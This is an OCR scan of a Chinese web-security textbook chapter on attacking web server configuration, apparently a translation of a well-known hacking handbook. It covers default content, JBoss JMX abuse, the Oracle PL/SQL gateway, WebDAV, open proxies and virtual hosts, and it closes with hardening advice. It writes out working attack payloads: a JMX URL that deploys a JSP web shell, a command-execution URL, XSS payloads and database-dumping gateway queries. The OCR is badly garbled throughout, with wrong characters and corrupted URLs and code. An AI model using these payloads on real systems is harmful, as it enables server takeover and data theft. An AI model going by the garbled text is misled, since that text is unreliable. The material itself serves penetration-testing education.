接口 的 Web 服 务 人 而 与 其 他 反 术 。 

(2) 对 Web 服 务 冲 进行 并 口 扫描 ,确定 在 指向 主 目标 应 用 程序 的 不 同 端口 上 运行 的 所 有 管 
理 接口 。 

(3) 对 于 确定 的 接口 ， 查 阅 制 造 疝 文 档 资 料 与 第 用 密码 表 ， 获 得 上 默认 证 书 。 使 用 Metasploit 
的 内 置 效 据 库 扫 摘 服务 内 。 

(4) 如 果 软 认证 书 无 效 ， 使 用 第 6 草 描 述 的 技巧 答 试 猜测 有 效 的 证 书 。 

(5) 如 采 能 够 访问 一 个 管理 接口 ， 审 碍 可 用 的 功能 ， 确 定 是 否 可 以 利用 这 项 功能 进一步 攻 
人 破 主 机 与 主 应 用 程序 。 

















18.1.2 默认 内 容 


大 多 数 Web 服 务 右 中 含有 可 用 于 攻击 服务 曾 目 里 或 主 目标 应 用 程序 的 上 默认 内 容 与 功能 。 以 下 
是 一 些 可 能 有 用 的 默认 内 容 。 
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口 为 管理 员 设 计 的 调试 与 测试 功能 。 

口 用 于 演示 某 些 常见 任务 的 样本 功能 。 

口 本 应 禁止 公众 访问 ， 但 无 意中人 允许 公众 访问 的 强大 功能 。 

口 包含 仅 在 安装 时 有 用 的 信息 的 Web 服 务 器 手册 。 

1. 调试 功能 

通常 ， 为 方便 管理 员 进 行 诊断 而 设计 的 功能 对 攻击 者 极其 有 用 ,因为 其 中 包含 与 服务 器 和 它 
上 面 运行 的 应 用 程序 的 配置 及 与 运行 状态 有 关 的 重要 信息 。 

图 18-1 为 默认 页 面 phpinfo.php ， 许 多 Apache 版 本 中 都 含有 该 页 面 。 这 个 页 面 运行 PHP 函 数 
phpinfo() 并 返回 其 结果 。 页 面 中 包含 大 量 与 PHP 环境 、 配 置 设置 、Web 服 务 疾 模块 和 文件 路 
径 有 关 的 信息 。 











< 加 古 http://wahh-live/phpinfo 


Linux ubuntu 2.6.27-7-server#1 SMP Fri Oct 24 07:37:55 UTC 2008 i686 
Oct 14 2008 19:43:47 
Apache 2.0 Handler 


Virtual disabled 


Support 
Configuration | /etc/php5/apache2 
File (php.ini) 


path 

Loaded /etciphps/apache2/php.ini 
Configuration 

File 


Scan this dir |/etcphp5/apache2/conf.d 
for 

additional .ini 

和 es 


jetclphp5/apache2iconf dimysqlini, /etcjphp5lapache2/conf dimys qliini, /etciphps/apache2/conf.d/pdo.ini, /etclphp5/apache2/ 
files parsed 


- 


本 | 











和 四 1003% 
图 18-1 默认 页 面 phpinfo.php 


2. 样本 功能 

许多 服务 硕 默 认 包 含 各 种 样本 脚本 与 页 面 , 其 目的 在 于 演示 某 些 Web 服 务 硕 功能 与 API 的 用 
法 。 通 常 ， 这些 样本 功能 并 无 害处 ， 也 不 会 给 攻击 者 提供 攻击 的 机 会 。 但 实际 上 ， 基 于 以 下 两 点 
原因 ， 事 实 并 非 如 此 。 

口 许多 样本 脚本 包含 安全 漏洞 ， 可 被 攻击 者 用 于 执行 脚本 作者 不 厦 望 执行 的 操作 。 

口 许多 样本 脚本 甚至 执行 可 被 攻击 者 卫 接 利用 的 功能 。 

第 一 个 问题 的 示例 为 Jetty 版 本 7.0.0 中 包含 的 Dump Servlet。 此 Servlet 可 以 通过 /test/jsp/dump.jsp 
之 类 的 URL 访 问 。 一 旦 被 访问 ， 它 会 打印 Jetty 安 装 及 当前 请 求 的 各 种 详情 ， 包括 请 求 查询 字符 串 。 
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此 ， 攻 击 者 只 需 在 URL 中 包含 脚本 标签 ， 如 /test/jsp/dump.jsp?%3Cscript%3Ealert(%22xss%22)% 
3C/script9%3E， 即 可 实施 跨 站 点 脚本 攻击 。 

Apache Tomcat 中 的 Sessions Example 脚 本 是 第 二 个 问题 的 典型 示例 。 如 图 18-2 所 示 ， 这 个 脚 
本 可 用 于 获取 并 设置 任意 会 话 变量 。 如 采 在 服务 六 上 运行 的 应 用 程序 将 敏感 数据 保存 在 用 户 会 话 
中 ， 攻 击 者 就 可 以 查看 这 些 数据 ， 将 通过 修改 它 的 值 来 破坏 应 用 程序 的 处 理 过 程 。 




















人 | | | 全 http://wahh-app/servlets-examples/servlet/SessionExample 





Sessions Example 

Session ID: 062CB1131F90F$1641BBBFDO40EF 1B45 
Created Thu Jul 14 16-15:46 GMT 2011 

Last Accessed Thu Jul 14 16:1$:46 GMT 2011 


The following data ls in your session: 


Name of Session Attribute: 
Value of Session Attribute- 


Submit Query 


GET based form- 


Name of Session Attribute: 
Value of Session Attribute: 


Submit Query 


URL encoded 








图 18-2” Apache Tomcat 中 的 默认 Sessions Example 脚 本 


3. 强大 的 功能 

许多 Web 服 务 硕 软件 包含 一 些 公 众 无 法 访问 的 强大 功能 , 但 终端 用 户 通 过 某 种 方式 可 以 访问 
这 些 功能 。 许 多 时 候 ， 只 要 提供 正确 的 管理 证 书 , 应 用 程序 服务 硕 都 允许 通过 应 用 程序 本 号 使 用 
的 同一 HITP 端 口 来 部 署 Web 档 案 ( WAR 文 件 ), 应 用 程序 的 这 种 部 普 过 程 是 黑客 的 主要 攻击 目标 。 
稼 见 的 渗透 测试 框架 能 够 目 动 完成 以 下 过 程 : 扫描 默认 证 书 、 上 传 包含 后 门 的 Web 档 案 ， 然 后 执 
行 该 档案 以 获取 远程 系统 上 的 命令 外 帝 ， 如 网 18-3 所 示 。 

4. JMX 

JBoss 默认 安 猴 的 JMX 探 制 台 是 一 种 典型 的 强大 软 认 内 容 。JMX 控 制 台 被 措 述 为 “JBoss 应 用 
程序 服务 硕 微 内 核 的 原始 视 网 "。 实 际 上 ,通过 它 可 以 直接 访问 JBoss 应 用 程序 服务 硕 中 的 任何 托 
管 Bean。 由 于 可 用 功能 的 数量 众多 ,， 因 此， 人 们 从 中 发 现 了 大 量 安全 漏洞 。 其 中 ,最 简单 的 利用 
方法 ,是 使 用 DeploymentFileRepository 中 的 store 方 法 创建 包含 后 门 的 WAR 文 件 , 如 图 18-4 
所 示 。 
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到 Metasploit i 


File Edt View Help 


”过 本 | 办 区 |@ 





图 18-3 ”使 用 Metasploit 攻 破 重要 的 Tomcat 服 务 需 








| 7%, JBoss JMX Management Console - WIN-.., | + | - 



















(no description) 
p2 java,lang,String {no description) 











art 



























全 ?080/jmx-console/HtmlIAdaptor?action=inspectMBean&name=jboss.admin33Aservice3%3DDeploymentFileReposittory ~ > 2 有 - 300gle 人 | 会 | 加: 
A - 
\ t isStored boolean MBean Operation. E 和 
> 『 ~ p3 java,lang.String 。 (no description) 
一 | Invoke | 
Object Name Filter pl javalang.String 。 (no desaiption) 
2 java,lang.Stri iption 
Remove Object Name Filter remove MBean Operation, | 和 ESe Rise (no nen 
@ JMImplementation 
@ com.ariuna.ats.properties Invoke 
@ jboss - 
@ boss.admin 本 1 ,Stri deccription 
@ jboss.alerts jbossInternallifecycle |void MBean Operation, Pas Hm Sem a ) 
@ jboss.aop Invoke 
3 
@ jboss.dassloader destroy 
@ jboss.deployment 
@ jboss.eib 
@ jboss.i2ee create void 
@ jboss.iacc 
@ jboss.ica 
全 
@ jboss.imx 
@ iboss.management.local 
3 
. 
名 
全 
3 
人 
3 
© 
£ 


IN 


[no parameters] 
MBean Operation， 7 
p3 java,lang.String (no desaip tion) 
jboss.cadhe [no parameters] 
MBean Operation., _Inv i 
jboss.idbc 
jboss.messaging 








(no description) 
p4 javalang.String (nodesciption) 
p5 boolean {no description) 9 True False 
| Invoke | 


jboss.messaging.connectionfactory store void MBean Operation， 
jboss.messaging.destination 

jboss.mg 

了 boss.poio 

jboss.remoting 

jboss.rmi 

jboss.security | 


an 一 km 一 
pn } 


A 





图 18-4 JMX 控 制 台 包含 可 用 于 部 署 任意 WAR 文 件 的 功能 
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例如 ， 以 下 URL 将 上 传 一 个 包含 后 门 的 cmdshell.jsp 页 面 : 


http://wahh-app.com: 8080/jmx-console/HtmlAdaptor?action=invokeOpByName&name= 
jboss.admin%s3Aservice%3DDeploymentFileRepository&tmethodName= 
Store&kargType=java.lang.String&argo0=cmdshell .wart&argType= 
java.lang.SsStringtkargl=cmdshell&argType=java.lang.Sstring&arg2= 
.JjSp&kargType=java. lang.String&karg3=%3C%25RUuNtime.getRuntime%®S28%29.exec 
S28request.getParameter®28%22c%S22T2929%3BS25T3ES0ALrargTybe= 
boolean&arg4=True 


如 岁 18-5 所 示 ， 该 URL 将 成 功 创建 可 执行 以 下 代码 的 服务 融 闪 后 门 : 























<%RuUuntime.getRuntime{) .exec (request .getParameter("c")}));%$> 
| 7, Operation Results | = 
€, i jmin33Aservice%3DDeploymentFileRepository&methodName=store&argType=java'lang.3tring&a -i 2- so 会 中 
: 2 | Back to Agent | [Back to MBean | 
JMX MBean Operation View 


[es) &argType =boolean&arg4=True™ value='Reinvoke 
KING MBean Operation' /> 


OQperation completed successfully without a return value! 


图 18-5 使 用 JMX 控 制 台 在 JBoss 服务 需 上 部 署 后 门 WAR 文 件 的 成 功 攻击 


然后 ， 内 置 的 部 署 扫 摘 希 会 日 动 将 木马 WAR 文 件 部 署 到 JBoss 应 用 程序 服务 硕 中 。 部 署 该 文 
件 后 , 即 可 以 在 新 建 的 cmdshell 应 用 程序 中 访问 这 个 文件 , 在 本 示例 中 ,其 中 仅 包 含 cmdshelljsp: 


http://wahh-app.com:8080/cmdshell/cmdshell.jsp?c=cm9G%20/ 
CS20ipconfig%3Ec: \foo 














注解 ”要 解决 上 述 问 题 ， 需 要 将 GET 和 POST 方 法 仅 限于 管理 员 使 用 。 但 是 ， 只 需 使 用 
HEAD 方 法 提出 上 述 请 求 ， 即 可 轻松 突破 这 种 限制 ( 有关 详细 信息 ， 请 访问 


www.securityfocus.com/bid/39710/ )。 和 任何 基于 配置 的 漏洞 一 样 ，Metasploit 等 工具 能 
够 相当 高 效 地 利用 各 种 此 类 JMX 漏 洞 。 





5. Oracle 应 用 程序 

强大 的 默认 功能 的 最 盘 型 示例 ， 要 属 Oracle 应 用 程序 服务 需 实 施 的 PL/SQL 网 关 ; 其 他 Oracle 
产品 ， 如 电子 商务 套件 (E-Business Suite ) 也 采用 了 这 个 网 关 。 这 项 功能 提供 一 个 接口 ， 通 过 它 
可 辐 一 个 后 端 Oracle 数 据 库 提 出 Web 请 求 。 攻 击 者 可 以 使 用 类 似 于 下 面 的 URL 回 数据 库 过 程 提 交 
任意 参数 : 

https://wahh-app.com/pls/dad/package .procedure?paraml=foos&param2=bar 

这 项 功能 本 用 于 将 某 个 数据 库 执行 的 业务 逻辑 转换 成 用 户 友好 的 Web 应 用 程序 。 但是， 由 于 
攻击 者 能 够 指定 任意 过 程 ， 因 此 ， 他 可 以 利用 PLMSQL 网 关 访 问 数据 库 中 的 强大 功能 。 例 如 ， 
SYS.OWA_UTIL.CELLSPRINT 过 程 可 用 于 执行 任意 数据 库 查 询 ， 从 而 获取 敏感 数据 : 


https://wahh-app.com/pls/dad/SYs.OWA UTIL.CELLSPRINT?P THEQUERY=SELECT+ 
*+FROM+USEIS 
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为 防止 这 种 攻击 ，Oracle 引 入 一 个 名 为 PL/SQL 排 除 列 表 ( Exclusion List ) 的 过 滤 硕 。 该 过 滤 
佑 检查 被 访问 的 包 的 名 称 ， 并 阻止 攻击 者 访问 任何 以 下 面 的 表达 式 开 头 的 包 : 

SYS . 

DBMS 

UTL 

OWA _ 

OWA. 

HTP. 

HTmF ， 


该 过 滤器 旨 在 阻止 攻击 者 访问 数据 库 中 功能 强大 的 默认 功能 。 但 是 ， 上 面 的 列表 并 不 全 面 ， 
无 法 阻止 攻击 者 访问 数据 库 管理 员 拥 有 的 其 他 功能 强大 的 默认 过 程 ， 如 CTXSYS 与 MDSYS。 此 
外 ， 本 章 后 面 还 会 介绍 与 PL/SQL 排除 列表 有 关 的 一 些 问题 。 

当然 ，PL/SQL 网 关 最 初 主 要 用 于 传送 数据 包 和 过 程 ， 但 此 后 发 现 它 的 许多 默认 功能 都 包含 
漏洞 。2009 年 ， 电 子 商 务 套件 的 默认 数据 包 组 成 部 分 被 证 实 包含 若干 漏洞 ,包括 可 被 攻击 者 用 于 
编辑 任意 页 面 。 人 研究 人 员 提 供 了 使 用 icx_dqefine_pages.DispPageDialog 在 管理 员 的 登录 页 
面 中 注入 HTML， 以 实施 保存 型 跨 站 点 脚本 攻击 的 示例 : 


/pls/dad/icx define pages.DispPageDialog?p mode=RENAME&amp;p page id=[page id-. 




















渗透 测试 步骤 

(1) Nikto 之 类 的 工具 可 有 效 确定 大 多 数 默认 的 Web 内 容 。 第 4 草 描 述 的 应 用 
应 已 确定 所 针对 的 服务 器 中 的 绝 大 多 数 默 认 内 容 。 

(2) 使 用 搜索 引 敬 和 其 他 资源 确定 与 已 知 应 用 程序 使 用 的 技术 有 关 的 默认 内 容 与 功能 。 如 





Tn 


旦 序 解 析 过 程 





来 可能， 可 在 本 地 计算 机 上 安 产 这 些 技 术 ， 从 中 查找 任何 可 在 渗透 测试 中 利用 的 于 认 功 能 。 


18.1.3 ”目录 列表 


当 Web 应 用 程序 收 到 一 个 访问 目录 而 非 真 实 文件 的 请 求 时 ， 它 会 以 下 面 这 3 种 方式 进行 响应 。 

口 它 返回 目录 中 的 一 个 默认 资源 ， 如 index.html。 

口 它 返回 一 个 错误 ， 如 HTTP 状 态 码 403 ， 表 示 请 求 被 禁止 。 

口 它 返回 一 个 列表 ， 显 示 目 录 的 内 容 ， 如 图 18-6 所 示 。 

许多 时 候 ， 目 录 列 表 (directory listing ) 并 不 会 造成 安全 威胁 。 例 如 ， 汇 露 一 个 网 像 目录 的 
索引 根本 不 会 引起 任何 不 良 后 果 。 确实 ， 人 们 和 常 第 有 意 汇 露 目录 列表 ， 因 为 它们 有 助 于 在 包含 静 
态 内 容 的 站 点 间 导 航 ， 如 前 例 所 示 。 但 是 ， 基 于 以 下 两 个 主要 原因 ， 获 得 目录 列表 有 利于 攻击 者 
对 应 用 程序 实施 攻击 。 

口 许多 应 用 程序 并 不 对 它们 的 功能 与 资源 实施 正确 的 访问 控制 ， 而 是 依赖 于 攻击 者 忽略 用 

于 访问 敏感 内 容 的 URL ( 请 参阅 第 8 章 了 解 相关 内 容 )。 
口 日 志 、 备 份 文件 、 旧 版 脚本 等 文件 与 日 录 经 常 被 无 意 遗 漏 在 服务 器 的 Web 根 日 录 中 。 
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人 | 攻 http://wahh-live/wahh-app/images/ 





Index of /pub/images 
Name Last modified Size Description 


4 Parent Directory - 
chart 2 jpg 15-Jun-2010 00:51 29K 
chart 3.ipg 15-Jun-2010 00:39 36K 
chart 4.ipg 15-Jun-2010 01:04 28K 
fle 0022011-12-03.csv 25-Jun-2011 20:42 418 
| 1594786352312123 pdf 12-Jul-2011 15:22 1.2M 

i2359345610434934pdf 15-Jun-2011 08:53 1.7M 

i-87263590101231422pdf SC 12-Jol-2011 06:52 467K 

i-93763107142419234pdf 。 12-Jul-2011 13:50 66K 
| i-328796512213712411pdf 03-Jul-2011 05:19 1.0M 
] p-0162412421354812121 pdf 16-Jun-2011 07:10 1.0M 
] p-129834661191024122 pdf ”27-Jan-2011 02:57 930K 
] P-239846411102895312 pdf 23-Jan-2011 09:15 2.3M 
| p-10294625342154187601 pdf 16-Jun-2011 06:49 1.1M 


ee 











图 18-6 “目录 列表 
在 上 述 两 种 情况 下 ,真正 的 漏洞 位 于 其 他 地 方 , 其 原因 在 于 没有 对 敏感 数据 实施 正确 的 访问 


控制 。 但 是 ， 由 于 这 些 漏洞 极其 普 志 ， 不 安全 的 资源 的 名 称 可 能 很 难 猜测 ， 因 此 ， 这 时 获得 目录 
列表 对 攻击 者 而 言 非常 重要 ， 往 往 可 以 让 他 们 迅速 攻破 整个 应 用 程序 。 














渗透 测 试 步 双 


癌 在 应 用 程序 解析 过 程 中 发 现 的 Web 服 务 右 上 的 每 一 个 目录 提出 一 个 请 求 , 确定 任何 返 
目录 列表 的 场合 。 





注解 除 上 述 可 直接 获得 目录 列表 的 情况 外 ， 攻 击 者 还 可 以 利用 大 量 已 经 在 Web 服 务 


we 本 章 后 面 将 讨论 其 中 一 些 漏洞 。 





18.1.4 WebDAV 方 法 


WebDAV 指 用 于 Web 分 布 式 创作 与 版 本 控制 的 HTTP 方 法 集合 。 自 1996 年 以 来 , 这 些 方法 得 到 
了 广泛 应 用 。 最近 的 云 存储 和 协作 应 用 程序 也 采用 了 WebDAV 方 法 ， 因 为 这 些 应 用 程序 需要 使 用 
现 有 的 防火 墙 友好 的 协议 (如 HTTP ) 跨 系统 访问 用 户 数 据 。 如 第 3 章 所 述 ，HTTP 请 求 能 够 使 用 
除 标准 GEgT 和 PosT 以 外 的 各 种 方法 。WebDAV 添 加 了 大 量 其 他 可 用 于 操纵 Web 服 务 器 上 的 文件 的 
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方法 。 鉴 于 其 提供 的 功能 的 特点 ， 如 果 这 些 方法 可 以 由 低 权 限 用 户 访问 ,这 些 用 户 就 可 以 利用 它 
们 对 应 用 程序 实施 有 将 攻 击 。 以 下 是 一 些 值得 注意 的 方法 : 

口 PUT， 向 指定 位 置 上 传 附加 文件 ; 

口 DELETE， 删 除 指定 的 资源 ; 

口 CoPY， 将 指定 的 资源 复制 到 pestination 消 息 头 指定 的 位 置 ; 

口 MOVE ， 将 指定 的 资源 移动 到 pestination 消 息 头 指定 的 位 置 ; 

口 SEARCH， 在 目录 路 径 中 搜索 资源 ; 

口 PROPFIND， 获 取 与 指定 资源 有 关 的 信息 ， 如 作者 、 大 小 与 内 容 类 型 。 
可 以 使 用 oPTIONS 方 法 列 出 某 个 特定 目录 人 允许 的 HITP 方 法 。 例 如: 


OPTIONS /public/ HTTP/1.0 


Host: mdsec.net 
































HTTP/1.1 200 OK 

Connection: close 

Date: Sun, 10 Apr 2011 15:56:27 GMT 

Server: Microsoft-II1S/6.0 

MicrosoftOfficeWebServer: 5.0_Pub 

X-Powered-By: ASP.NET 

MS-AUthor-Via: MS-FP/4.0,DAYV 

Content-Length: 0 

Accept-Ranges: none 

DASL: <DAV:Sql> 

DAV:; 1, 2 

Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIN 
D, PROPPATCH, DOCK, UNLOCK, SEARCH 

Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK 





Cache-Control: private 

这 个 响应 指出 ， 上 面 列 出 的 几 个 强大 的 方法 可 以 在 目录 中 使 用 。 然 而 , 实际 上 , 使 用 这 些 方 
法 需要 通过 吴 份 验证 ， 或 取决 于 其 他 限制 。 

其 中 ，PUT 方 法 特别 危险 。 如 果 能 够 上 传 Web 根 目录 中 的 任意 文件 ， 就 可 以 在 服务 器 上 创建 
将 由 服务 融 闪 模块 执行 的 后 门 脚本 ， 从 而 完全 控制 应 用 程序 ， 甚 至 是 Web 服 务 船 本 号 。 如 有 果 PUT 
方法 存在 且 被 激活 ， 就 可 以 通过 以 下 方式 证 实 这 一 点 : 

PUT /public/test.txt HTTP/1.1 


Host: mdsec.net 
Content-Length: 4 











test 


HTTP/1.1 201 Created 


雪 章 和 


注意 , 应 用 程序 可 能 会 针对 每 个 目录 实施 不 同 的 权限 , 因此 , 在 测试 过 程 中 需要 进行 递归 检 
碍 。 这 时 ， 可 以 使 用 DAVTest(〈 将 在 下 一 节 介绍 ) 之 类 的 工具 在 服务 融 的 所 有 目录 中 检查 PUT 方 
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法 ， 并 确定 这 些 目录 人 允许 使 用 哪些 文件 扩展 名 。 为 克服 使 用 PUT 上 传 后 门 脚本 的 限制 ， 该 工具 还 
会 在 MovVE 方 法 后 使 用 PUT 方法 ， 例 如 : 


C;\>perl Qavtest .pl -url http:;//mdsec.net/public -directory 1 -move -guiet 


MOVE .ASP FAIL 
MOVE: .Shtml] FAIL 
MOYVE .aSpX FAIL 


davtest .pl Summary: 

Created: http://mdsec.net/public/1 

MOVE/PUT File: http://medsec.net/public/i/davtiest Umt1llhIi8izy2.php 
MOVE/PUT File: http://mAsec.net/public/l/davtiest UmtllhIi8izy2.html 
MOVE/PUT File: http://mdsec.net/public/i/davtest Umt1lhIi8izy2.cgi 
MOVE/PUT File: http://mdsec.net/public/l/davtest UmtllhIi8izy2.cfm 
MOVE/PUT File: http://mdsec.net/public/i/davtest Umt1llhIi8izy2.jsp 
MOVE/PUT File; http://mdsec,.net/public/l/davtest Umt1llhIi8izy2.p1 
MOVE/PUT File: http://mdsec.net/public/l/davtest UmtllhIi8izy2.txt 
MOVE/PUT File: http://mdsec.net/public/i/davtest Umt1l]hIi8izy2.jhtml 
Executes: http://mdsec.net/public/l/davtest Umt1l1lihIi8izy2.html 
Executes: http://madsec.net/public/1l/davtest Umt1lihIi8izy2 .txt 


尝试 访问 


http://mdsec.net/public/ 





提示 允许 终端 用 户 上 传 文件 的 WebDAV 实例 通常 禁止 上 传 特定 于 服务 器 环境 的 服务 
号 0 用 户 可 以 上 传 HTML 或 JAR 文 件 , 攻击 者 可 以 利 


两 种 文件 实施 针对 其 他 用 户 的 攻击 ( 请 参阅 第 12 草 和 第 13 章 了 解 相 关 信 息 )。 





渗透 测试 步骤 

要 测试 服务 吾 如 何 处 理 不 同 的 HTTP 方 法 ， 需 要 使 用 某 种 工具 ， 如 Burp Repeater， 渗 透 测 
试 员 可 以 使 用 该 工具 发 送 任意 请 求 ， 并 完全 控制 消息 尖 和 消息 主体 。 

(1) 使 用 oPTIONS 方 法 列 出 服务 器 使 用 的 HTTP 方 法 。 注意, 不 同 目 录 中 激活 的 方法 可 能 
不 相 同 图 

(2) 许多 时 候 ， 一 些 方法 被 告知 有 效 ， 但 实际 上 它们 并 不 能 使 用 。 有 时 ， 即 使 oPTIONS 请 
求 返 回 的 啊 应 中 没有 列 出 某 个 方法 , 但 该 方法 仍然 可 用 。 因 此 ， 应 手动 测试 每 一 个 方法 , 确认 
其 是 否 可 用 。 

(3) 如 有 果 发 现 一 些 WebDAV 方 法 被 激活 ， 应 使 用 激活 WebDAV 的 客户 端 进行 深入 调查 ， 如 
Microsoft FrontPage 或 Internet Explorer 中 的 “以 Web 文 件 夹 方式 打开 ”( Open as Web Folder ) 选项 。 
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(a) 尝试 使 用 puT 方 法 上 传 一 个 良性 文件 ， 如 文本 文件 。 

(b) 如 果 上 传 成 功 ， 尝 试 使 用 PuUT 上 传 一 个 后 门 脚本 。 

(c) 如 果 运 行 脚本 所 需 的 扩展 名 受到 阻止 ， 尝 试 以 .tt 展 名 上 传 该 文件 ， 并 使 用 MoVE 
方法 将 其 移动 到 采用 新 扩展 名 的 文件 中 。 

(d) 如 果 以 上 方法 均 无 效 ， 尝 试 上 传 一 个 JAR 文 件 ， 或 一 个 浏览 器 会 将 其 内 容 显 示 为 
HTML 的 文件 。 

(e) 使 用 davtest.pl 之 类 的 工具 遍历 所 有 目录 。 








18.1.5 ” Web 服务 器 作为 代理 服务 器 


Web 服 务 需 有 时 被 配置 为 转发 或 反问 HITP 代 理 服务 需 (请 参阅 第 3 章 了 解 相关 内 容 )。 如 果 
一 合 服务 需 被 配置 为 转发 代理 服务 需 , 那么 根据 它 的 配置 ,可 以 利用 该 服务 硕 执 行 以 下 各 种 攻击 。 
口 攻击 者 可 以 使 用 该 服务 需 攻 击 因 特 网 上 的 第 三 方 系统 ， 对 攻击 目标 而 言 ， 恶 意 流 量 似乎 
是 来 目 易 受 攻 击 的 代理 服务 需 。 
口 攻击 者 可 以 使 用 代理 服务 需 连 接 组 织 内 部 网 络 中 的 任意 主机 ， 攻 击 从 因特网 无 法 直接 访 
问 的 目标 。 
口 攻击 者 可 以 使 用 代理 服务 需 反 回 连 接 代 理 服务 需 主 机 上 运行 的 其 他 服务 ， 突 破 防火 载 限 
制 ， 并 利用 信任 关系 避 开 刁 份 验证 。 
可 以 使 用 两 种 主要 的 技巧 让 转发 代理 服务 需 进 行 正 辐 连 接 ( onward connection ), 第 一 种 方法 是 ， 
发 送 一 个 包含 完整 URL 的 HTTP 请 求 ， 该 URL 中 包括 一 个 主机 名 称 与 一 个 端口 写 ( 可 选 )。 例 如 : 


GET http://wahh-otherapp.com:80/ HTTP/1.0 























HTTP/1.1 200 OK 


如 琳 配 置 服务 带 将 请 求 转发 到 指定 的 主机 ,那么 它 将 返回 屠 台 主机 的 内 容 。 但 是 , 一 定 记得 
核实 返回 的 内 容 不 是 来 目 最 初 的 服务 大 。 大 多 数 Web 服 务 融 接受 包含 完整 URL 的 请 求 ; 许多 服务 
售 则 完全 名 上 略 在 URL 中 指定 的 主机 ， 从 它们 日 己 的 Web 根 目录 中 返回 被 请 求 的 资源 。 

第 二 种 利用 代理 服务 器 的 方法 是 使 用 coNNECcT 方 法 指定 到 目标 主机 与 端口 号 。 例 如 : 


CONNECT wahh-otherapp.com:443 HTTP/1.C 








HTTP/1.0 200 Connection establishedqd 

如 果 服 务 右 以 这 种 方式 做 出 响应 ， 就 表示 它 正 在 代理 该 连接 。 通常 , 第 二 种 技巧 的 功能 更 强 
大 ,因为 现在 代理 服务 需 将 转发 传送 到 指定 主机 以 及 由 该 主机 送出 的 所 有 流量 ， 人 允许 穿 透 连 接 中 
的 其 他 协议 ， 攻 击 非 HITP 服 务 。 然 而 ， 大 多 数 代 理 服务 融 对 通过 CONNECT 方 法 可 到 达 的 端口 实 
施 严 格 的 限制 ， 通 篆 只 人 允许 连接 端口 443。 

利用 这 种 攻击 的 技巧 已 经 在 10.4.1 节 详细 介绍 过 了 。 
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渗透 测试 步骤 
(1) 使 用 GET 与 CONNECT 请 求 ， 尝 试用 Web 服 务 侣 作为 代理 服务 如， 连接 因特网 上 的 其 他 服 








务 骨 ， 并 获取 其 中 的 内 容 。 
(2) 答 试 使 用 前 面 描述 的 两 种 扩 马 连接 主机 基础 架构 中 的 不 同 卫 地 址 与 闪 口 。 


(3) 笠 试 使 用 前 面 描 述 的 两 种 技巧 , 在 请 求 中 指定 127.0.0.1 为 目标 主机 , 连接 Web 服 务 胡 上 





的 稼 用 交口 号 。 


18.1.6 ”虚拟 主机 配置 缺陷 
第 17 章 介绍 了 如 何 使 用 HTTP Host 消 息 头 指定 返回 内 容 的 Web 站 点 ， 配 置 Web 服 务 估 为 几 个 


Web 站 点 的 主机 。 在 Apache 中 ， 虚 拟 主机 通过 以 下 方式 配置 : 


<VirtualHost 大 > 
ServerName els 
DocumentRoot /var/www2 


</VirtualHost> 


除 DocumentRoot 指 令 外 ， 还 可 以 使 用 虚拟 主机 容 希 为 Web 站 点 指定 其 他 配置 选项 o 这 时 ， 
我 们 第 犯 的 一 个 错误 是 忽略 默认 主机 , 导致 任何 安全 配置 仅 适 用 于 一 台 虚 拟 主机 ,而 在 访问 默认 








主机 时 却 可 轻易 避 开 。 


渗透 测试 步 又 
(1) 使 用 以 下 方式 向 根 目 录 提 交 GET 请 求 : 
口 正确 的 Host 消 息 头 ; 
口 随意 Host 消 息 头 ; 
口 Host 消 息 头 中 的 服务 天 IP 地 址 ; 


口 无 Host 消 息 头 。 
(2) 对 这 些 请 求 的 啊 应 进行 比较 。 稼 见 的 结束 是， 在 Host 消 息 头 中 使 用 一 个 下 地 址 可 获得 











目录 列表 。 还 可 以 获得 各 种 先 认 内 容 。 
(3) 如 果 观 察 到 不 同 的 行为 ， 使 用 生成 不 同 结 末 的 Host 消 息 头 重 复 应 用 程序 解析 过 程 。 一 


定 要 使 用 -vhost 选项 进行 一 次 Nikto 扫 描 ,， 确定 在 最 初 的 应 用 程序 解析 过 程 中 忽略 的 任何 默认 








内 容 。 





18.1.7 ”保障 Web 服 务 器 配置 的 安全 
从 本 质 上 讲 ， 保 隐 Web 服 务 融 配置 的 安全 并 不 困难 ; 通 肖 ， 政 忽 大 童 与 缺乏 安全 意识 是 造成 
问题 的 主要 原因 。 最 重要 的 是 必须 充分 了 解 所 使 用 的 软件 的 文档 资料 及 有 关 的 强化 指南 。 
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就 需要 解决 的 常见 配置 问题 而 言 ， 确 你 包括 以 下 所 有 领域 。 

口 如 有 可 能 ， 修 改 所 有 默认 证 书 ， 包 括 用 户 名 和 密码。 删除 任何 不 必要 的 账户 。 

口 在 Web 根 目录 的 相关 路 径 上 应 用 访问 控制 列表 ( Access Control List，ACL ), 或 者 对 非 标 
准 咒 口 设置 防火 墙 ， 阻止 公众 访问 管理 接口 。 

口 删除 所 有 实现 商业 目的 并 不 完全 需要 的 默认 内 容 与 功能 。 浏 览 Web 目 录 中 的 内 容 , 确定 任 
何 选 留 的 项 目 ， 使 用 Nikto 工 具 进 行 重复 检查 。 

口 如 有 果 和 需要 保留 任何 默认 功能 ， 尽 量 对 其 进行 强化 ， 禁 用 不 必要 的 选项 与 行为 。 

口 在 所 有 Web 目 录 中 查找 目录 列表 。 如 有 可 能 , 在 一 个 控制 整个 服务 硕 的 配置 中 蔡 用 目录 列 
表 。 还 可 以 确保 每 个 目录 包含 服务 带 上 默认 提供 的 index.html 文 件 。 

口 除 应 用 程序 常用 的 方法 外 ( 通 第 为 GET 与 PosT 方 法 )， 禁 用 其 他 所 有 方法 。 

口 确保 没有 将 Web 服 务 硕 配置 为 代理 服务 入 。 如 采 确 实 需要 这 项 功能 ， 应 尽量 强化 其 配置 ， 
只 允许 它 连 接 可 合法 访问 的 特定 主机 与 端口 。 还 可 以 执行 网 络 层 过 滤 ， 以 此 作为 另 一 层 
防御 ， 探 制 Web 服 务 硕 回 外 发 出 的 请 求 。 

口 如 末 Web 服 务 需 文 持 虚拟 主机 ， 确 保 在 默认 主机 上 实施 服务 融 采 用 的 所 有 安全 强化 措施 。 
执行 前 面 描述 的 测试 ， 证 明确 实 实施 了 安全 强化 。 


18.2” 吻 受 攻击 的 服务 器 软件 


Web 服 务 硕 软件 的 形式 各 异 ， 包括 仅 用 于 显示 毅 态 页 面 的 极其 简单 的 轻 量 级 软件 ， 以 及 能 够 
